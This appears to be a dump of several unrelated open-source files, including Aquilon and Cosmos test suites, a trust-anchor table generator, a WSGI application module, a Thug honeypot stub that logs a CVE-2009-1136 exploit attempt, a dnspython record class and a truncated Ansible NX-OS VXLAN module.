        self.matchoutput(out, "Template: service/utsvc/utsi2", command)
    def testverifybinddns(self):
        command = "show host --hostname unittest02.one-nyp.ms.com"
        out = self.commandtest(command.split(" "))
        self.matchoutput(out, "Template: service/dns/utdnsinstance", command)
    def testbindbootserver(self):
        command = ["bind", "client", "--hostname", "unittest02.one-nyp.ms.com",
                   "--service", "bootserver", "--instance", "np.test"]
        (out, err) = self.successtest(command)
        self.matchoutput(err,
                         "unittest02.one-nyp.ms.com adding binding for "
                         "service bootserver instance np.test",
                         command)
    def testverifybindbootserver(self):
        command = "show host --hostname unittest02.one-nyp.ms.com"
        out = self.commandtest(command.split(" "))
        self.matchoutput(out, "Template: service/bootserver/np.test", command)
    def testbindntp(self):
        command = ["bind", "client", "--hostname", "unittest02.one-nyp.ms.com",
                   "--service", "ntp", "--instance", "pa.ny.na"]
        (out, err) = self.successtest(command)
        self.matchoutput(err,
                         "unittest02.one-nyp.ms.com adding binding for "
                         "service ntp instance pa.ny.na",
                         command)
    def testverifybindntp(self):
        command = "show host --hostname unittest02.one-nyp.ms.com"
        out = self.commandtest(command.split(" "))
        self.matchoutput(out, "Template: service/ntp/pa.ny.na", command)
    # For unittest00, will test that afs and dns are bound by make aquilon
    # because they are required services.  Checking the service map
    # functionality for bind client, below.
    def testbindautobootserver(self):
        # No --instance: the broker must auto-select one from the service map.
        command = ["bind", "client", "--hostname", "unittest00.one-nyp.ms.com",
                   "--service", "bootserver"]
        (out, err) = self.successtest(command)
        self.matchoutput(err,
                         "unittest00.one-nyp.ms.com adding binding for "
                         "service bootserver instance np.test",
                         command)
    def testverifybindautobootserver(self):
        command = "show host --hostname unittest00.one-nyp.ms.com"
        out = self.commandtest(command.split(" "))
        self.matchoutput(out, "Template: service/bootserver/np.test", command)
    def testbindautontp(self):
        command = ["bind", "client", "--hostname", "unittest00.one-nyp.ms.com",
                   "--service", "ntp"]
        (out, err) = self.successtest(command)
        self.matchoutput(err,
                         "unittest00.one-nyp.ms.com adding binding for "
                         "service ntp instance pa.ny.na",
                         command)
    def testverifybindautontp(self):
        command = "show host --hostname unittest00.one-nyp.ms.com"
        out = self.commandtest(command.split(" "))
        self.matchoutput(out, "Template: service/ntp/pa.ny.na", command)
if __name__ == '__main__':
    # Run this module's tests directly (outside the full broker suite).
    suite = unittest.TestLoader().loadTestsFromTestCase(TestBindClient)
    unittest.TextTestRunner(verbosity=2).run(suite)
|
turbulenz/gyp
|
refs/heads/master
|
test/module/gyptest-default.py
|
53
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies simple build of a "Hello, world!" program with loadable modules. The
default for all platforms should be to output the loadable modules to the same
path as the executable.
"""
import TestGyp
# Generate and build the loadable-module sample project.
test = TestGyp.TestGyp()
test.run_gyp('module.gyp', chdir='src')
test.build('module.gyp', test.ALL, chdir='src')
# The program loads lib1/lib2 from its own output directory, so all three
# greetings must appear on stdout in this order.
expect = """\
Hello from program.c
Hello from lib1.c
Hello from lib2.c
"""
test.run_built_executable('program', chdir='src', stdout=expect)
test.pass_test()
|
station7/xbmc
|
refs/heads/master
|
lib/libUPnP/Neptune/Extras/Scripts/GenTrustAnchorsTables.py
|
264
|
#! /usr/bin/env python
###
### Generate trust anchor tables from a text file
### like, for example, TLS-Trust-Anchors-base.crt
## and TLS-Trust-Anchors-extended.crt located under Extras/Data
###
### imports
import sys
import base64
### generate a C file with bult-in TLS trust anchors
# License/header banner copied verbatim into every generated .cpp/.h file.
FILE_HEADER = """/*****************************************************************
|
|   Neptune - Trust Anchors
|
|   This file is automatically generated by a script, do not edit!
|
| Copyright (c) 2002-2010, Axiomatic Systems, LLC.
| All rights reserved.
|
| Redistribution and use in source and binary forms, with or without
| modification, are permitted provided that the following conditions are met:
|     * Redistributions of source code must retain the above copyright
|       notice, this list of conditions and the following disclaimer.
|     * Redistributions in binary form must reproduce the above copyright
|       notice, this list of conditions and the following disclaimer in the
|       documentation and/or other materials provided with the distribution.
|     * Neither the name of Axiomatic Systems nor the
|       names of its contributors may be used to endorse or promote products
|       derived from this software without specific prior written permission.
|
| THIS SOFTWARE IS PROVIDED BY AXIOMATIC SYSTEMS ''AS IS'' AND ANY
| EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
| WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
| DISCLAIMED. IN NO EVENT SHALL AXIOMATIC SYSTEMS BE LIABLE FOR ANY
| DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
| (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
| LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
| ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
| (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
| SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
 ****************************************************************/
"""
if len(sys.argv) != 3:
    print "usage: GenTrustAnchosTable.py <input-file> <category>"
    print "       where category may be 'Base', 'Extended', or other"
    sys.exit(1)
INPUT_FILE = sys.argv[1]
CERT_CATEGORY = sys.argv[2]
# DER encoding of the OID prefix 1.2.840.113549.1.1 (PKCS#1 RSA signature
# algorithms); certs whose DER lacks it are skipped as unsupported.
digest_oid_pattern = "\x2a\x86\x48\x86\xf7\x0d\x01\x01"
in_cert = False
prev = ''
prev_prev = ''
index = 0
Certs = []
CertNames = []
CertComments = []
# NOTE(review): iterates sys.argv[1] directly even though INPUT_FILE was
# assigned above — same value, but INPUT_FILE would be clearer.
for line in open(sys.argv[1]).readlines():
    if line.startswith('-----BEGIN CERTIFICATE-----'):
        in_cert = True
        b64 = ''
        continue;
    if line.startswith('-----END CERTIFICATE-----'):
        cert = base64.decodestring(b64);
        if not digest_oid_pattern in cert:
            sys.stderr.write("-------- skipping cert (digest not supported) -------\n")
            continue
        Certs.append(cert)
        cert_name = 'NptTlsTrustAnchor_%s_%04d' % (CERT_CATEGORY, index)
        #cert_comment = eval('"'+prev_prev.rstrip('\r\n')+'"')
        # prev_prev is the line two before BEGIN — the human-readable
        # certificate subject in the input file.
        cert_comment = prev_prev.rstrip('\r\n')
        CertNames.append(cert_name)
        CertComments.append(cert_comment)
        # Emit one .cpp per certificate with its DER bytes as a C array.
        out = open(CERT_CATEGORY+'/'+cert_name+'.cpp', 'w+b')
        out.write(FILE_HEADER)
        out.write('/* %s */\n' % (cert_comment))
        out.write('const unsigned char %s_Data[%d] = {\n' % (cert_name, len(cert)))
        counter = 0
        sep = ''
        for byte in cert:
            out.write('%s0x%02x' % (sep, ord(byte)))
            counter += 1
            sep = ','
            if counter == 8:
                # 8 bytes per generated source line.
                out.write('\n')
                counter = 0
        in_cert = False
        out.write('};\n')
        out.write('const unsigned int %s_Size = %d;\n' % (cert_name, len(cert)))
        index += 1
        out.close()
        continue
    if in_cert:
        b64 += line.rstrip('\r\n')
    else:
        prev_prev = prev
        prev = line
# Aggregate .cpp: includes all per-cert files plus a NULL-terminated table.
out = open('NptTlsDefaultTrustAnchors'+CERT_CATEGORY+'.cpp', 'w+b')
out.write(FILE_HEADER)
out.write("/* This file is automatically generated by GenTrustAnchorsTables.py, do not edit */\n\n")
out.write('#include "NptTls.h"\n')
total_size = 0
for i in xrange(0, len(CertNames)):
    out.write('#include "'+CERT_CATEGORY+'/'+CertNames[i]+'.cpp" /* '+CertComments[i]+' */\n')
    total_size += len(Certs[i])
out.write("/* total anchors size ="+ str(total_size)+" */\n\n")
out.write('const NPT_TlsTrustAnchorData NptTlsDefaultTrustAnchors%s[%s] = {\r\n' % (CERT_CATEGORY, 1+len(Certs)))
sep = '    '
for i in xrange(0, len(Certs)):
    out.write('%s{ %s_Data, %s_Size} /* %s */' % (sep, CertNames[i], CertNames[i], CertComments[i]))
    sep = ',\r\n    '
out.write(sep+'{0, 0} /* sentinel */\n')
out.write('};\n')
out.close()
# Matching header with extern declarations for every anchor.
out = open('NptTlsDefaultTrustAnchors'+CERT_CATEGORY+'.h', 'w+b')
out.write(FILE_HEADER)
out.write("/* This file is automatically generated by GenTrustAnchorsTables.py, do not edit */\n\n")
out.write('#include "NptTls.h"\n\n')
out.write('extern const NPT_TlsTrustAnchorData NptTlsDefaultTrustAnchors%s[%d];\n\n' % (CERT_CATEGORY, 1+len(Certs)))
for i in xrange(0, len(CertNames)):
    out.write('/* '+CertComments[i]+' */\n')
    out.write('extern const unsigned int   %s_Size;\n' % (CertNames[i]))
    out.write('extern const unsigned char  %s_Data[];\n\n' % (CertNames[i]))
out.close()
|
beekpr/wsgiservice
|
refs/heads/master
|
wsgiservice/application.py
|
1
|
"""Components responsible for building the WSGI application."""
import logging
import webob
import wsgiservice
import wsgiservice.resource
logger = logging.getLogger(__name__)
class Application(object):
    """WSGI application wrapping a set of WsgiService resources. This class
    can be used as a WSGI application according to :pep:`333`.

    :param resources: A list of :class:`wsgiservice.Resource` classes to be
                      served by this application.

    .. todo:: Easy deployment using good configuration file handling
    """
    #: A list of request attributes to log. Each of these must be a valid
    #: attribute name of a :class:`webob.Request` instance and is included in
    #: the log output if it's non-empty. (Default: ['url', 'remote_user',
    #: 'remote_addr', 'referer'])
    LOG_DATA = ['url', 'remote_user', 'remote_addr', 'referer']
    #: A list of request headers to log. Each of these is logged if it was sent by
    #: the client and is non-empty. (Default: ['From'])
    LOG_HEADERS = ['From']
    #: :class:`wsgiservice.resource.Resource` class. Used as the default
    #: resource when the routing does not return any match.
    NOT_FOUND_RESOURCE = wsgiservice.resource.NotFoundResource
    #: Resource classes served by this application. Set by the constructor.
    _resources = None
    #: :class:`wsgiservice.routing.Router` instance. Set by the constructor.
    _urlmap = None

    def __init__(self, resources):
        """Constructor.

        :param resources: List of :class:`wsgiservice.resource.Resource`
                          classes to be served by this application.
        """
        self._resources = resources
        self._urlmap = wsgiservice.routing.Router(resources)

    def __call__(self, environ, start_response):
        """WSGI entry point. Serve the best matching resource for the current
        request. See :pep:`333` for details of this method.

        :param environ: Environment dictionary.
        :param start_response: Function called when the response is ready to
                               be served.
        """
        try:
            request = webob.Request(environ)
            self._log_request(request)
            response = self._handle_request(request)
            return response(environ, start_response)
        except Exception as e:
            # Log with traceback, then let the WSGI server produce the 500.
            logger.exception('Uncaught exception in service: %s', e)
            raise

    def _log_request(self, request):
        """Log the most important parts of this request.

        :param request: Object representing the current request.
        :type request: :class:`webob.Request`
        """
        msg = []
        for d in self.LOG_DATA:
            val = getattr(request, d)
            if val:
                msg.append(d + ': ' + repr(val))
        for d in self.LOG_HEADERS:
            if d in request.headers and request.headers[d]:
                msg.append(d + ': ' + repr(request.headers[d]))
        logger.info("Request information: %s", ', '.join(msg))

    def _handle_request(self, request):
        """Finds the resource to which a request maps and then calls it.
        Instantiates, fills and returns a :class:`webob.Response` object. If
        no resource matches the request, a 404 status is set on the response
        object.

        :param request: Object representing the current request.
        :type request: :class:`webob.Request`
        """
        response = webob.Response(request=request)
        path = request.path_info
        parsed = self._urlmap(path)
        if parsed:
            path_params, resource = parsed
        else:
            path_params, resource = {}, self.NOT_FOUND_RESOURCE
        instance = resource(request=request, response=response,
                            path_params=path_params, application=self)
        response = instance()
        if request.method == 'HEAD':
            # HEAD responses must not carry a body. Use bytes: on Python 3
            # webob requires Response.body to be bytes (assigning '' raises),
            # while on Python 2 b'' is the same object as ''.
            response.body = b''
        return response
def get_app(defs, add_help=True):
    """Build an :class:`Application` from the resources found in *defs*.

    Usually called with ``globals()`` from the module where the resources are
    defined. Every subclass of :class:`wsgiservice.Resource` (that declares a
    ``_path``) found among the dictionary's values is served; everything else
    is ignored.

    :param defs: Dictionary whose values are scanned for resource classes.
    :type defs: dict
    :param add_help: Whether to add the Help resource, exposing this
                     service's documentation at /_internal/help.
    :type add_help: boolean
    :rtype: :class:`Application`
    """
    def is_resource(candidate):
        try:
            return issubclass(candidate, wsgiservice.Resource) and \
                hasattr(candidate, '_path')
        except TypeError:
            # candidate wasn't a class at all
            return False

    resources = [obj for obj in defs.values() if is_resource(obj)]
    if add_help:
        resources.append(wsgiservice.resource.Help)
    return Application(resources)
|
buffer/thug
|
refs/heads/master
|
thug/ActiveX/modules/Spreadsheet.py
|
1
|
# OWC10/11.Spreadsheet ActiveX
# CVE-2009-1136
import logging
log = logging.getLogger("Thug")
def _Evaluate(self, *args):
    # Honeypot stub for the OWC Spreadsheet `_Evaluate` method: any call is
    # treated as a CVE-2009-1136 exploitation attempt and logged; no value
    # is computed or returned.
    log.ThugLogging.log_exploit_event(self._window.url,
                                      "OWC 10/11.Spreadsheet ActiveX",
                                      "Attack in _Evaluate function",
                                      cve = "CVE-2009-1136")
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2009-1136")
def Evaluate(self, *args):
    """Log an exploitation attempt against the Evaluate method (CVE-2009-1136)."""
    cve = "CVE-2009-1136"
    log.ThugLogging.log_exploit_event(self._window.url,
                                      "OWC 10/11.Spreadsheet ActiveX",
                                      "Attack in Evaluate function",
                                      cve=cve)
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, cve)
|
gabrielfalcao/lettuce
|
refs/heads/master
|
tests/integration/lib/Django-1.2.5/tests/regressiontests/middleware_exceptions/__init__.py
|
12133432
| |
adlius/osf.io
|
refs/heads/develop
|
api_tests/requests/__init__.py
|
12133432
| |
leeseulstack/openstack
|
refs/heads/master
|
neutron/plugins/ml2/drivers/cisco/nexus/__init__.py
|
12133432
| |
Azure/azure-documentdb-python
|
refs/heads/master
|
test/query_execution_context_tests.py
|
1
|
#The MIT License (MIT)
#Copyright (c) 2014 Microsoft Corporation
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import unittest
import uuid
import pytest
from six.moves import xrange
import azure.cosmos.documents as documents
import azure.cosmos.cosmos_client as cosmos_client
from azure.cosmos.execution_context import base_execution_context as base_execution_context
import azure.cosmos.base as base
import test.test_config as test_config
#IMPORTANT NOTES:
# Most test cases in this file create collections in your Azure Cosmos account.
# Collections are billing entities. By running these test cases, you may incur monetary costs on your account.
# To Run the test, replace the two member fields (masterKey and host) with values
# associated with your Azure Cosmos account.
@pytest.mark.usefixtures("teardown")
class QueryExecutionContextEndToEndTests(unittest.TestCase):
    """Routing Map Functionalities end to end Tests.

    End-to-end coverage for the default query execution context: both the
    iterator protocol (next()) and explicit paging (fetch_next_block())
    against a live, hash-partitioned Azure Cosmos collection.
    """

    # Account settings shared by all tests; pulled from the test config.
    host = test_config._test_config.host
    masterKey = test_config._test_config.masterKey
    connectionPolicy = test_config._test_config.connectionPolicy

    @classmethod
    def setUpClass(cls):
        """Create the client, database, collection and 20 sample documents."""
        if (cls.masterKey == '[YOUR_KEY_HERE]' or
                cls.host == '[YOUR_ENDPOINT_HERE]'):
            raise Exception(
                "You must specify your Azure Cosmos account values for "
                "'masterKey' and 'host' at the top of this class to run the "
                "tests.")

        cls.client = cosmos_client.CosmosClient(QueryExecutionContextEndToEndTests.host,
                                                {'masterKey': QueryExecutionContextEndToEndTests.masterKey},
                                                QueryExecutionContextEndToEndTests.connectionPolicy)
        cls.created_db = test_config._test_config.create_database_if_not_exist(cls.client)
        cls.created_collection = cls.create_collection(cls.client, cls.created_db)
        cls.collection_link = cls.created_collection['_self']

        cls.document_definitions = []
        # create 20 documents with distinct ids ('0'..'19')
        for i in xrange(20):
            d = {'id': str(i),
                 'name': 'sample document',
                 'spam': 'eggs' + str(i),
                 'key': 'value'}
            cls.document_definitions.append(d)
        cls.insert_doc(cls.client, cls.created_db, cls.collection_link, cls.document_definitions)

    @classmethod
    def tearDownClass(cls):
        # Delete the (billed) collection created in setUpClass.
        cls.client.DeleteContainer(cls.collection_link)

    def setUp(self):
        # sanity check: the collection exposes at least one partition key range
        partition_key_ranges = list(self.client._ReadPartitionKeyRanges(self.collection_link))
        self.assertGreaterEqual(len(partition_key_ranges), 1)

        # sanity check: read documents after creation
        queried_docs = list(self.client.ReadItems(self.collection_link))
        self.assertEqual(
            len(queried_docs),
            len(self.document_definitions),
            'create should increase the number of documents')

    def test_no_query_default_execution_context(self):
        # Page size divides the 20 documents evenly.
        options = {}
        options['maxItemCount'] = 2
        self._test_default_execution_context(options, None, 20)

    def test_no_query_default_execution_context_with_small_last_page(self):
        # 20 % 3 != 0, so the final page is smaller than maxItemCount.
        options = {}
        options['maxItemCount'] = 3
        self._test_default_execution_context(options, None, 20)

    def test_simple_query_default_execution_context(self):
        # Parameterized query excluding one document -> 19 results expected.
        query = {
            'query': 'SELECT * FROM root r WHERE r.id != @id',
            'parameters': [
                {'name': '@id', 'value': '5'}
            ]
        }

        options = {}
        options['enableCrossPartitionQuery'] = True
        options['maxItemCount'] = 2

        res = self.client.QueryItems(self.collection_link, query, options)
        self.assertEqual(len(list(res)), 19)

        self._test_default_execution_context(options, query, 19)

    def test_simple_query_default_execution_context_with_small_last_page(self):
        query = {
            'query': 'SELECT * FROM root r WHERE r.id != @id',
            'parameters': [
                {'name': '@id', 'value': '5'}
            ]
        }

        options = {}
        options['enableCrossPartitionQuery'] = True
        options['maxItemCount'] = 3

        self._test_default_execution_context(options, query, 19)

    def _test_default_execution_context(self, options, query, expected_number_of_results):
        """Run *query* through _DefaultQueryExecutionContext and verify that
        both iteration styles yield exactly expected_number_of_results items.
        """
        page_size = options['maxItemCount']
        collection_link = self.GetDocumentCollectionLink(self.created_db, self.created_collection)
        path = base.GetPathFromLink(collection_link, 'docs')
        collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)

        def fetch_fn(options):
            # Fetch callback handed to the execution context.
            return self.client.QueryFeed(path,
                                         collection_id,
                                         query,
                                         options)

        ######################################
        # test next() behavior
        ######################################
        ex = base_execution_context._DefaultQueryExecutionContext(self.client, options, fetch_fn)
        it = ex.__iter__()

        def invokeNext():
            return next(it)

        results = {}
        # validate that invocations of next() produce the expected results
        for _ in xrange(expected_number_of_results):
            item = invokeNext()
            results[item['id']] = item

        self.assertEqual(len(results), expected_number_of_results)

        # after the result set is exhausted, invoking next must raise StopIteration
        self.assertRaises(StopIteration, invokeNext)

        ######################################
        # test fetch_next_block() behavior
        ######################################
        ex = base_execution_context._DefaultQueryExecutionContext(self.client, options, fetch_fn)

        results = {}
        cnt = 0
        while True:
            fetched_res = ex.fetch_next_block()
            fetched_size = len(fetched_res)

            for item in fetched_res:
                results[item['id']] = item
            cnt += fetched_size

            if (cnt < expected_number_of_results):
                # every page before the last is expected to be full
                self.assertEqual(fetched_size, page_size, "page size")
            else:
                if cnt == expected_number_of_results:
                    # the last page may be short
                    self.assertTrue(fetched_size <= page_size, "last page size")
                    break
                else:
                    # cnt > expected_number_of_results
                    self.fail("more results than expected")

        # validate the number of collected results
        self.assertEqual(len(results), expected_number_of_results)

        # no more results will be returned
        self.assertEqual(ex.fetch_next_block(), [])

    @classmethod
    def create_collection(cls, client, created_db):
        # Hash-partitioned on /id so queries exercise the partitioned path.
        collection_definition = {'id': 'query_execution_context_tests collection ' + str(uuid.uuid4()),
                                 'partitionKey':
                                 {
                                     'paths': ['/id'],
                                     'kind': documents.PartitionKind.Hash
                                 }
                                 }

        collection_options = {}

        created_collection = client.CreateContainer(created_db['_self'],
                                                    collection_definition,
                                                    collection_options)
        return created_collection

    @classmethod
    def insert_doc(cls, client, created_db, collection_link, document_definitions):
        # create one document per definition and return them all
        created_docs = []
        for d in document_definitions:
            created_doc = client.CreateItem(collection_link, d)
            created_docs.append(created_doc)
        return created_docs

    def GetDatabaseLink(self, database, is_name_based=True):
        # Name-based links avoid resolving the server-generated self link.
        if is_name_based:
            return 'dbs/' + database['id']
        else:
            return database['_self']

    def GetDocumentCollectionLink(self, database, document_collection, is_name_based=True):
        if is_name_based:
            return self.GetDatabaseLink(database) + '/colls/' + document_collection['id']
        else:
            return document_collection['_self']
if __name__ == "__main__":
    # To run a single test: sys.argv = ['', 'Test.testName']
    unittest.main()
|
azoft-dev-team/imagrium
|
refs/heads/win
|
env/Lib/test/test_inspect_jy.py
|
23
|
"""Misc inspect tests
Made for Jython.
"""
import inspect
import unittest
from java.lang import System
from test import test_support
class InspectTestCase(unittest.TestCase):
    """Checks inspect's handling of Java callables (Jython-specific)."""

    def test_java_routine(self):
        # java.lang.System.arraycopy is a Java method; inspect.isroutine
        # should classify it as a routine.
        self.assertTrue(inspect.isroutine(System.arraycopy))
def test_main():
    """Entry point used by the regression-test framework."""
    test_support.run_unittest(InspectTestCase)


if __name__ == '__main__':
    test_main()
|
felipsmartins/namebench
|
refs/heads/master
|
nb_third_party/dns/rdtypes/ANY/AFSDB.py
|
248
|
# Copyright (C) 2003-2007, 2009, 2010 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import dns.rdtypes.mxbase
class AFSDB(dns.rdtypes.mxbase.UncompressedDowncasingMX):
    """AFSDB record

    @ivar subtype: the subtype value
    @type subtype: int
    @ivar hostname: the hostname name
    @type hostname: dns.name.Name object"""

    # Use the property mechanism to make "subtype" an alias for the
    # "preference" attribute, and "hostname" an alias for the "exchange"
    # attribute.
    #
    # This lets us inherit the UncompressedMX implementation but lets
    # the caller use attribute names appropriate to the AFSDB rdata type.
    #
    # We probably lose some performance vs. a cut-and-paste
    # implementation, but this way we don't copy code, and that's
    # good.

    def get_subtype(self):
        # Alias read of the inherited "preference" field.
        return self.preference

    def set_subtype(self, subtype):
        # Alias write of the inherited "preference" field.
        self.preference = subtype

    subtype = property(get_subtype, set_subtype)

    def get_hostname(self):
        # Alias read of the inherited "exchange" field.
        return self.exchange

    def set_hostname(self, hostname):
        # Alias write of the inherited "exchange" field.
        self.exchange = hostname

    hostname = property(get_hostname, set_hostname)
|
kustodian/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/nxos/nxos_vxlan_vtep_vni.py
|
8
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_vxlan_vtep_vni
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Creates a Virtual Network Identifier member (VNI)
description:
- Creates a Virtual Network Identifier member (VNI) for an NVE
overlay interface.
author: Gabriele Gerbino (@GGabriele)
notes:
- Tested against NXOSv 7.3.(0)D1(1) on VIRL
- default, where supported, restores params default value.
options:
interface:
description:
- Interface name for the VXLAN Network Virtualization Endpoint.
required: true
vni:
description:
- ID of the Virtual Network Identifier.
required: true
assoc_vrf:
description:
- This attribute is used to identify and separate processing VNIs
that are associated with a VRF and used for routing. The VRF
and VNI specified with this command must match the configuration
of the VNI under the VRF.
type: bool
ingress_replication:
description:
- Specifies mechanism for host reachability advertisement.
choices: ['bgp','static', 'default']
multicast_group:
description:
- The multicast group (range) of the VNI. Valid values are
string and keyword 'default'.
peer_list:
description:
- Set the ingress-replication static peer list. Valid values
are an array, a space-separated string of ip addresses,
or the keyword 'default'.
suppress_arp:
description:
- Suppress arp under layer 2 VNI.
type: bool
suppress_arp_disable:
description:
- Overrides the global ARP suppression config.
This is available on NX-OS 9K series running 9.2.x or higher.
type: bool
version_added: "2.8"
state:
description:
- Determines whether the config should be present or not
on the device.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- nxos_vxlan_vtep_vni:
interface: nve1
vni: 6000
ingress_replication: default
'''
RETURN = '''
commands:
description: commands sent to the device
returned: always
type: list
sample: ["interface nve1", "member vni 6000"]
'''
import re
from ansible.module_utils.network.nxos.nxos import get_config, load_config
from ansible.module_utils.network.nxos.nxos import nxos_argument_spec
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.config import CustomNetworkConfig
# Module arguments whose on-device state is a bare flag (present/absent).
BOOL_PARAMS = [
    'assoc_vrf',
    'suppress_arp',
    'suppress_arp_disable',
]

# Value a parameter takes when the user asks for 'default'.
PARAM_TO_DEFAULT_KEYMAP = {
    'multicast_group': '',
    'peer_list': [],
    'ingress_replication': '',
}

# Module argument name -> NX-OS CLI keyword.
PARAM_TO_COMMAND_KEYMAP = {
    'assoc_vrf': 'associate-vrf',
    'interface': 'interface',
    'vni': 'member vni',
    'ingress_replication': 'ingress-replication protocol',
    'multicast_group': 'mcast-group',
    'peer_list': 'peer-ip',
    'suppress_arp': 'suppress-arp',
    'suppress_arp_disable': 'suppress-arp disable',
}


def get_value(arg, config, module):
    """Extract the current value of *arg* from a config section string.

    Boolean params are detected by bare presence of their CLI keyword;
    'peer_list' collects every 'peer-ip <addr>' line into a list; every
    other param returns the text following its keyword ('' when absent).

    :param arg: key of PARAM_TO_COMMAND_KEYMAP to look up
    :param config: config section text (searched line by line)
    :param module: AnsibleModule (unused, kept for call-site symmetry)
    """
    command = PARAM_TO_COMMAND_KEYMAP[arg]
    # Compiled with re.M so '$' matches at each end-of-line.
    command_val_re = re.compile(r'(?:{0}\s)(?P<value>.*)$'.format(command), re.M)

    if arg in BOOL_PARAMS:
        command_re = re.compile(r'\s+{0}\s*$'.format(command), re.M)
        value = False
        if command_re.search(config):
            value = True
    elif arg == 'peer_list':
        # Bug fix: findall()'s second positional argument is *pos*, not
        # flags. The old code passed re.M (== 8) here, which started the
        # scan 8 characters into the config and silently dropped leading
        # 'peer-ip' entries. Multiline matching is already enabled by the
        # re.M flag given to re.compile() above.
        value = command_val_re.findall(config)
    else:
        value = ''
        # Same fix as above: Pattern.search() takes (string, pos, endpos).
        has_command_val = command_val_re.search(config)
        if has_command_val:
            value = has_command_val.group('value')
    return value
def check_interface(module, netcfg):
    """Return the name of the NVE interface found in *netcfg*, or ''.

    Only 'interface nveN' stanzas are considered; *module* is unused but
    kept for call-site symmetry with the other helpers.
    """
    match = re.search(r'(?:interface nve)(?P<value>.*)$', str(netcfg), re.M)
    if match:
        return 'nve{0}'.format(match.group('value'))
    return ''
def get_existing(module, args):
    """Collect the on-device VNI configuration for the NVE interface.

    Returns a tuple ``(existing, interface_name)`` where *existing* maps
    each name in *args* to the value parsed from the running config
    (empty dict when the interface or the VNI member is absent).
    """
    existing = {}
    netcfg = CustomNetworkConfig(indent=2, contents=get_config(module))
    nve_name = check_interface(module, netcfg)
    if nve_name:
        vni = module.params['vni']
        parents = ['interface {0}'.format(nve_name)]
        section = netcfg.get_section(parents)
        config = {}
        # The associate-vrf form must be probed first: its line contains
        # the plain 'member vni N' text as a substring.
        for member in ('member vni {0} associate-vrf'.format(vni),
                       'member vni {0}'.format(vni)):
            if member in section:
                parents.append(member)
                config = netcfg.get_section(parents)
                break
        if config:
            for arg in args:
                if arg not in ('interface', 'vni'):
                    existing[arg] = get_value(arg, config, module)
            existing['interface'] = nve_name
            existing['vni'] = vni
    return existing, nve_name
def apply_key_map(key_map, table):
    """Rename *table*'s keys via *key_map*; entries without a mapping are dropped."""
    return {key_map[key]: value
            for key, value in table.items()
            if key_map.get(key)}
def state_present(module, existing, proposed, candidate):
    """Translate the proposed-vs-existing diff into NX-OS CLI commands and
    queue them on *candidate* under the appropriate parent hierarchy.
    """
    commands = list()
    # Both dicts are re-keyed from module argument names to CLI keywords.
    proposed_commands = apply_key_map(PARAM_TO_COMMAND_KEYMAP, proposed)
    existing_commands = apply_key_map(PARAM_TO_COMMAND_KEYMAP, existing)

    for key, value in proposed_commands.items():
        if key == 'associate-vrf':
            command = 'member vni {0} {1}'.format(module.params['vni'], key)
            if not value:
                command = 'no {0}'.format(command)
